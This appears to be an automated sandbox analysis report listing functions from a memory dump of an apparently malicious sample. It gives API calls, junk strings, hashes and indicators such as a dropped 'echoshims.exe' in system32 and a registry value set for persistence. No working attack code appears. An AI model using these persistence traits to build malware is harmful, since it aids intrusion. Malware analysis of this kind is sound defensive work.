Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CryptHashParam
String ID:
API String ID: 1839025277-0
Opcode ID: a6b98db821ea0323443dc9bf4183492cb94679861b6a0adaea720f19a752f732
Instruction ID: 6ea20aadac3bc16b9d3e7a8cd8a141280ab1c246a7139331002827fa967e4ddd
Opcode Fuzzy Hash: a6b98db821ea0323443dc9bf4183492cb94679861b6a0adaea720f19a752f732
Instruction Fuzzy Hash: B1B092B0546208BAE6349B90AD0EF7AB63CD784709F408289BE08A219196764E1455B0

Uniqueness

Uniqueness Score: 0.02%

Function 002156EF, Relevance: .5, Instructions: 487COMMON

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d701a1bb30259ff8f6d5ddbc6d78449f4ceb43618f1ffb19ebef044216f1192a
Instruction ID: 2cdfff3041396c9a1d72b7dfc576c6be359e56f30ad2d2db661888fffc261134
Opcode Fuzzy Hash: d701a1bb30259ff8f6d5ddbc6d78449f4ceb43618f1ffb19ebef044216f1192a
Instruction Fuzzy Hash: A9127271E2062ADBCF18CF59C8902FDBBF1FFA4300F24416AD866A7744D67499A1DB90

Uniqueness

Uniqueness Score: 0.00%

Function 00211530, Relevance: .0, Instructions: 19COMMON

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3b20853c12e01583646f0bc9b5b796af15d36b12eeb5013d60b718caa977e6
Instruction ID: 284b977ec6f657a68c0cfe8a9d956af061062b6d229fdd98d8e6fceb841769dd
Opcode Fuzzy Hash: fb3b20853c12e01583646f0bc9b5b796af15d36b12eeb5013d60b718caa977e6
Instruction Fuzzy Hash: 2AE0C232530411EBC7719E4888C09A6F3FBEBD47A07AA041ADA6A73A00C374BCB08750

Uniqueness

Uniqueness Score: 0.00%

Function 002121B0, Relevance: .0, Instructions: 3COMMON

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction ID: dd1ea78877d89c8c1f21003391c56dd86dd10fe21c56db2a52adb93900471d7c
Opcode Fuzzy Hash: 98b478bd1af69a2275d0ab39f1ac079ffe73a0c4551ec61df12d917ad4ecd62f
Instruction Fuzzy Hash: 8EA00275752980CFCE12CB09C394F9073F4F744B41F0504F1E80997A11C238A900CA00

Uniqueness

Uniqueness Score: 0.00%

Function 0021814A, Relevance: 42.5, APIs: 1, Strings: 23, Instructions: 464libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00219248

Strings

id]], xrefs: 002186E0
+?5, xrefs: 00219195
\Oh, xrefs: 002186F4
-v8W, xrefs: 002184BA
)c=, xrefs: 002188DE
', xrefs: 0021833E
`h, xrefs: 00218550
SD`, xrefs: 00218FAA
]7, xrefs: 00218F8C
;X~, xrefs: 00218A00
`[3f, xrefs: 002185F0
v9C, xrefs: 00218F64
FKx|, xrefs: 00218E42
x, xrefs: 00218B18
GQ:, xrefs: 00218460
TyFi, xrefs: 00218212
vrSw, xrefs: 00218B2C
2Hl9, xrefs: 002190D6
p3", xrefs: 00219126
9N, xrefs: 00218726
}#y, xrefs: 002190C2
I5OD, xrefs: 00218B68
= L-, xrefs: 00218500

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: }#y$ +?5$)c=$-v8W$2Hl9$;X~$= L-$FKx|$GQ:$I5OD$SD`$TyFi$\Oh$`[3f$id]]$p3"$vrSw$v9C$'$9N$`h$]7$x
API String ID: 1029625771-680546991
Opcode ID: d0f37ed454d34f00da2bab4ba826acc83797524bc2bff66c571a028a5a36ad68
Instruction ID: d37057fa2ca63c67d7e2b25718ce1a4985255b379d8cd195a896d115f96318c1
Opcode Fuzzy Hash: d0f37ed454d34f00da2bab4ba826acc83797524bc2bff66c571a028a5a36ad68
Instruction Fuzzy Hash: B982A5F48567A98FDB619F419E857CEBA31BB51304F5082C8C19D3B215CB720B96CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0021A78A, Relevance: 40.7, APIs: 1, Strings: 22, Instructions: 474libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0021B8EC

Strings

/g=, xrefs: 0021A9BA
ML-', xrefs: 0021B4B4
7k/, xrefs: 0021B69E
B"* , xrefs: 0021B374
.ZI, xrefs: 0021AC4E
7, xrefs: 0021B388
\1>, xrefs: 0021A7A8
:X<, xrefs: 0021B878
' #C, xrefs: 0021AE38
S1p, xrefs: 0021AA96
D=z, xrefs: 0021B5D6
WfP=, xrefs: 0021AF3C
eJn}, xrefs: 0021B568
^a, xrefs: 0021AE7E
H D%, xrefs: 0021B55E
RN5`, xrefs: 0021AB90
)jt@, xrefs: 0021B7ED
@3", xrefs: 0021B766
=z4, xrefs: 0021B45A
%h(, xrefs: 0021B068
/Z7~, xrefs: 0021ACEE
7K3, xrefs: 0021B720

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: .ZI$\1>$' #C$)jt@$/Z7~$7$7k/$:X<$=z4$@3"$B"* $D=z$H D%$ML-'$RN5`$S1p$WfP=$eJn}$%h($/g=$7K3$^a
API String ID: 1029625771-3980248509
Opcode ID: aeab3df4cc60778f76ded2e7954f545e6fe1d16230a05405934d5062586330aa
Instruction ID: a8c8bacbec034dd492995889cfb53ac85ee96eef1cea9b6bae16440313b21c49
Opcode Fuzzy Hash: aeab3df4cc60778f76ded2e7954f545e6fe1d16230a05405934d5062586330aa
Instruction Fuzzy Hash: 3482A6F48567698BDB71DF429E8578EBA71BB51304F6086C8C19D3B214CB720B92CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0021C4A2, Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 188libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0021CAD8

Strings

Rh<R, xrefs: 0021C5E2
P0", xrefs: 0021C916
D 0, xrefs: 0021C524
"RD, xrefs: 0021CAA3
"qZ, xrefs: 0021C8A8
3|G, xrefs: 0021C9B1
y{-, xrefs: 0021C5D8
?z=B, xrefs: 0021CA33
yR O, xrefs: 0021CA25
5qP, xrefs: 0021C943
+, xrefs: 0021C8F8
M{%, xrefs: 0021CAAA

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: "RD$"qZ$+$3|G$5qP$?z=B$D 0$M{%$P0"$Rh<R$yR O$y{-
API String ID: 1029625771-2687345366
Opcode ID: 544b0f831fdb6b54472581a0145003926358e1800b9110417c173d3664fed768
Instruction ID: 2ace0424fcc40e5751621c4be8dac8308a4cf001f83b280356ac211c0f918b18
Opcode Fuzzy Hash: 544b0f831fdb6b54472581a0145003926358e1800b9110417c173d3664fed768
Instruction Fuzzy Hash: 84E197B4856369DBDB60DF829A897CDBA70FB16304F6086C8C19D3B314DB750A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00219C2A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 312libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 0021A738

Strings

3:, xrefs: 0021A6D2
f,Ee, xrefs: 00219CA2
}W@, xrefs: 0021A662
*8c=, xrefs: 0021A27E
B, xrefs: 0021A35A
bYT@, xrefs: 00219CAC
8q#V, xrefs: 00219ED2
`(", xrefs: 0021A5B2
2Cu, xrefs: 0021A5D5
;T{, xrefs: 0021A38C
"GT+, xrefs: 00219D42

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ;T{$"GT+$*8c=$3:$8q#V$B$`("$bYT@$f,Ee$}W@$2Cu
API String ID: 1029625771-535669214
Opcode ID: c7547243a9ba196837203cadd046cde3c39aefb0b45f6d7772398c289503783a
Instruction ID: 348a88fa6043e5fbc8b7aa54ee4587e0c24bc5edd88d31368cd015380e46db28
Opcode Fuzzy Hash: c7547243a9ba196837203cadd046cde3c39aefb0b45f6d7772398c289503783a
Instruction Fuzzy Hash: FE32A6F4C163698BEB61DF4299897CCBB74BB01704F6096C8D16C3A225CB754B86CF89

Uniqueness

Uniqueness Score: 100.00%

Function 0021929A, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00219BDC

Strings

h , xrefs: 00219A06
?/&9, xrefs: 00219858
OI5, xrefs: 00219BCA
7cn@, xrefs: 00219A56
,M[, xrefs: 002194FC
[aY<, xrefs: 00219B13
z9, xrefs: 0021954C
XX, xrefs: 002199F2
Jg, xrefs: 002196B4
0E_, xrefs: 00219452
=WB, xrefs: 00219B67

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ,M[$0E_$7cn@$?/&9$OI5$[aY<$h $=WB$Jg$XX$z9
API String ID: 1029625771-656464786
Opcode ID: 17d854c644c8032166f5983611b9241f5e136eb01f76d2c2b50977a9e0a8cfbe
Instruction ID: 27c46b83659111178bbe21a08cd4b25234e30daf258b5b7e76c0d3421e22e5ce
Opcode Fuzzy Hash: 17d854c644c8032166f5983611b9241f5e136eb01f76d2c2b50977a9e0a8cfbe
Instruction Fuzzy Hash: 4912C5B4C563A98BDB71DF82AA897CCBB74BB01304F6096C8D1593B214CB750B82CF85

Uniqueness

Uniqueness Score: 100.00%

Function 00216E3A, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 140libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00217290

Strings

D, xrefs: 00216E6C
yfH, xrefs: 002171E4
V6'J, xrefs: 00217254
?&8, xrefs: 00216EE4
p/", xrefs: 0021716E

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ?&8$V6'J$p/"$yfH$D
API String ID: 1029625771-2057726821
Opcode ID: c7d03b5374bc0381c58abc2b937b5a62aa051ea6ed37811e4a272303782a5287
Instruction ID: a664d81179ebb2b91b134308d01e0a13972f96caaa6d7fd51928daa99253b969
Opcode Fuzzy Hash: c7d03b5374bc0381c58abc2b937b5a62aa051ea6ed37811e4a272303782a5287
Instruction Fuzzy Hash: 4EA1B7B4C5936C9FEB608F81AA857CDBA71FB12344F6086C8C5693B614CB750A82CF95

Uniqueness

Uniqueness Score: 100.00%

Function 002110B7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33UNIQUE

APIs

_snwprintf.NTDLL ref: 002110D6
CreateEventW.KERNEL32(?,00000001,?,?), ref: 002110F1
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 002110FE
CloseHandle.KERNEL32(00000000), ref: 00211105
CloseHandle.KERNEL32(00000000), ref: 00211111

Strings

", xrefs: 002110BA

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID: "
API String ID: 2675716504-2280192692
Opcode ID: af18ab6d55ac4aaba77cdc396ba71d68d2a9a820e0cf1717c7effb5bd5c74815
Instruction ID: 7547822a25106548c8b381a2c089201c22791a14f6e7b176b1651f75ccc5d435
Opcode Fuzzy Hash: af18ab6d55ac4aaba77cdc396ba71d68d2a9a820e0cf1717c7effb5bd5c74815
Instruction Fuzzy Hash: F5F0B471920520B7D7326BA0EC4CFEE7679DF56700F040190FA0A93241DB348AA18BA5

Uniqueness

Uniqueness Score: 100.00%

Function 0021F42E, Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 28UNIQUE

APIs

_snwprintf.NTDLL ref: 0021F485

Strings

0;", xrefs: 0021F43B
C:\Windows\system32, xrefs: 0021F473
P9", xrefs: 0021F464
echoshims, xrefs: 0021F447, 0021F46E
C:\Windows\system32\echoshims.exe, xrefs: 0021F480

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: _snwprintf
String ID: 0;"$C:\Windows\system32$C:\Windows\system32\echoshims.exe$P9"$echoshims
API String ID: 3988819677-1234077290
Opcode ID: 190386b6381cf8f68849bc349cac4004f7dd291030d65857ef12b71ce7249358
Instruction ID: 7113fe5952c56da940f9fa3fbc08a5b48be092fbe75cffab5112b95a890b0736
Opcode Fuzzy Hash: 190386b6381cf8f68849bc349cac4004f7dd291030d65857ef12b71ce7249358
Instruction Fuzzy Hash: 38E0126477817173921572E43863AEE50828B96790B501274FB466F3C2C8B41DB247DE

Uniqueness

Uniqueness Score: 100.00%

Function 002111CD, Relevance: 9.0, APIs: 6, Instructions: 27synchronizationCOMMON

APIs

GetModuleFileNameW.KERNEL32 ref: 002111CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 002111F1
CloseHandle.KERNEL32(?), ref: 002111FA
CloseHandle.KERNEL32(?), ref: 00211203
CloseHandle.KERNEL32 ref: 0021120A
CloseHandle.KERNEL32 ref: 00211211

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: 8202075387082be3a59beb722bac043718e6940f35ad37bba573a831ed81b996
Instruction ID: 38aa7b6a65183c297a110a7000052b54447c8cf58084ae9fa872d1503e8b0d02
Opcode Fuzzy Hash: 8202075387082be3a59beb722bac043718e6940f35ad37bba573a831ed81b996
Instruction Fuzzy Hash: EEE03036600015BBDB116BE0FD0D9EDBB79EB19613F001261F616D00E0DB2146568B61

Uniqueness

Uniqueness Score: 0.01%

Function 00217C6A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 147libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00218106

Strings

:yd(, xrefs: 00218076
.", xrefs: 00217F9E
Y<o, xrefs: 00217D64
ra:|, xrefs: 00218007

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ."$:yd($ra:|$Y<o
API String ID: 1029625771-69255199
Opcode ID: 2ad0ec340d862e81e26520dba3e0f82dd24bca66d992164a9ed6e268032ccfa4
Instruction ID: 502f06ddeab682184bcff801b5ed28d015807f74a5476221aa4ee0355106908e
Opcode Fuzzy Hash: 2ad0ec340d862e81e26520dba3e0f82dd24bca66d992164a9ed6e268032ccfa4
Instruction Fuzzy Hash: 28B1B7B4C59369DBDB20DF829A817DDBA71FB16300F6081C8D5993B315DB740A86CF86

Uniqueness

Uniqueness Score: 100.00%

Function 0021FA30, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29stringCOMMON

APIs

lstrcpyW.KERNEL32(?,C:\Windows\system32), ref: 0021FA3B
lstrlenW.KERNEL32(?,?,C:\Windows\system32), ref: 0021FA42
GetTickCount.KERNEL32(?,?,C:\Windows\system32), ref: 0021FA54

Strings

x, xrefs: 0021FA77
C:\Windows\system32, xrefs: 0021FA35

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CountTicklstrcpylstrlen
String ID: C:\Windows\system32$x
API String ID: 974621299-2137071385
Opcode ID: afd9278559d7ec2cac75e9907003d43ea3a51c59f020430b61f21656d31a5762
Instruction ID: 25dfc2393306cf389ded80d106bbaa68c2574496d71b0bf40a7760844229bd5b
Opcode Fuzzy Hash: afd9278559d7ec2cac75e9907003d43ea3a51c59f020430b61f21656d31a5762
Instruction Fuzzy Hash: E4F055B3A15354BBC3206FE0ECC850637A9EF50352B052070EC05DB212DF70C84187E0

Uniqueness

Uniqueness Score: 0.02%

Function 00212031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37processCOMMON

APIs

CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 00212055
CloseHandle.KERNEL32(?), ref: 0021207C
CloseHandle.KERNEL32(?), ref: 00212085

Strings

D, xrefs: 00212039

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: 0c8a57c26fd117d0497fb405d04a8936b216fa5cd40169099b01d3f934f8b671
Instruction ID: 98a54a5023939fc11d1ba0d0a4eee6fade168fedf8529eb9a7122aae475ae6a0
Opcode Fuzzy Hash: 0c8a57c26fd117d0497fb405d04a8936b216fa5cd40169099b01d3f934f8b671
Instruction Fuzzy Hash: E3F09671A50209B7EB315FD4EC05FED77B8EB15700F100251FA04A91D0DBB295A0C754

Uniqueness

Uniqueness Score: 0.01%

Function 0021FC13, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36registryCOMMON

APIs

RegCreateKeyExW.ADVAPI32(80000001,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0021FC35
RegSetValueExW.ADVAPI32(?,echoshims,00000000,00000001,?,00000000), ref: 0021FC5A
RegCloseKey.ADVAPI32(?), ref: 0021FC63

Strings

echoshims, xrefs: 0021FC52

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseCreateValue
String ID: echoshims
API String ID: 1818849710-4057679904
Opcode ID: ab62d6af3e43ce50a5267ab47a747e624806fa943cc5230959122301f1bf3dc5
Instruction ID: a5738282a9b44816c26ffba50cd577a6facfbde179ba42447cb856c2d412bb02
Opcode Fuzzy Hash: ab62d6af3e43ce50a5267ab47a747e624806fa943cc5230959122301f1bf3dc5
Instruction Fuzzy Hash: B2F08971750218BAFB30AB90BC4BFDD3768DB14700F200161FB05A91D1D7B15A6096D5

Uniqueness

Uniqueness Score: 4.31%

Function 0021FCA0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32stringCOMMON

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000), ref: 0021FCAE
lstrlenW.KERNEL32 ref: 0021FCB5
GetTickCount.KERNEL32 ref: 0021FCC7

Strings

x, xrefs: 0021FCEA

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CountFolderPathTicklstrlen
String ID: x
API String ID: 2993136144-2363233923
Opcode ID: c84a50b68ede517a48549a82926ba612fa6c65a292354083d343e1e691436085
Instruction ID: 47ee6170e625545f191ae8c1607425c4dde4cf42ea3db4dfc7d51dc84ac8af65
Opcode Fuzzy Hash: c84a50b68ede517a48549a82926ba612fa6c65a292354083d343e1e691436085
Instruction Fuzzy Hash: 12F0ECB2614315BBE7206FE0EC88B063699EF40752F155070FA09EF292DBB4C80187E0

Uniqueness

Uniqueness Score: 0.02%

Function 0021F3CE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15UNIQUE

APIs

SHGetFolderPathW.SHELL32 ref: 0021F3CE
_snwprintf.NTDLL ref: 0021F3FA

Strings

C:\Windows\system32, xrefs: 0021F3E8, 0021F3F5
p>", xrefs: 0021F3DE

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: FolderPath_snwprintf
String ID: C:\Windows\system32$p>"
API String ID: 3078599568-3446129234
Opcode ID: 325eb033b3d9a0fe293d6f69f399cc90d2d8209719cfeeac3f5e350f81f4a68f
Instruction ID: c63f0b6f431e3180d1a9fda3f9659cc5ecf9df9fe251eb63617c7de822c5017d
Opcode Fuzzy Hash: 325eb033b3d9a0fe293d6f69f399cc90d2d8209719cfeeac3f5e350f81f4a68f
Instruction Fuzzy Hash: 4FD0A9607A80B1B7D621A2E83C2FAEA64A18B46794B401230FB025A2C2C9B0083187A4

Uniqueness

Uniqueness Score: 100.00%

Function 0021FDCE, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

APIs

_snwprintf.NTDLL ref: 0021FDEB
CloseHandle.KERNEL32(?), ref: 0021FE18
CloseHandle.KERNEL32(?), ref: 0021FE21
CloseHandle.KERNEL32(?), ref: 0021FE2A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: 3701b567932c47434786f3e3156db706ba7e80ebe4fce2a6c67adf55a368cfea
Instruction ID: 5562f385b6d6d3a39549a633686f967c70818b07d42314fc1e657f38b42069e8
Opcode Fuzzy Hash: 3701b567932c47434786f3e3156db706ba7e80ebe4fce2a6c67adf55a368cfea
Instruction Fuzzy Hash: 82F03671910019ABDF10ABE0FD499EE7779EF19311F4005A5F605A6051DB318B618F91

Uniqueness

Uniqueness Score: 0.01%

Function 00215EE5, Relevance: 5.1, APIs: 4, Instructions: 82COMMON

APIs

memset.NTDLL ref: 00215EEE
memset.NTDLL ref: 00215F7D
memset.NTDLL ref: 00215F93
memset.NTDLL ref: 00215FA9

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 6fe89e89089d24987f8413e132b65b9cbc18f397eccaf435153cd19ba955b088
Instruction ID: c6d31a72d8b81adff7f13e21ed31b1d82a578e20d31d5e4af210b4fc0eb15f84
Opcode Fuzzy Hash: 6fe89e89089d24987f8413e132b65b9cbc18f397eccaf435153cd19ba955b088
Instruction Fuzzy Hash: D131D6B1E10515EBDB08CF90D9457EDBBF4FFA9305F2441A9E506A7680D374A6A1CF80

Uniqueness

Uniqueness Score: 0.00%

Function 00215D95, Relevance: 5.1, APIs: 4, Instructions: 79COMMON

APIs

memset.NTDLL ref: 00215DA8
memset.NTDLL ref: 00215F7D
memset.NTDLL ref: 00215F93
memset.NTDLL ref: 00215FA9

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
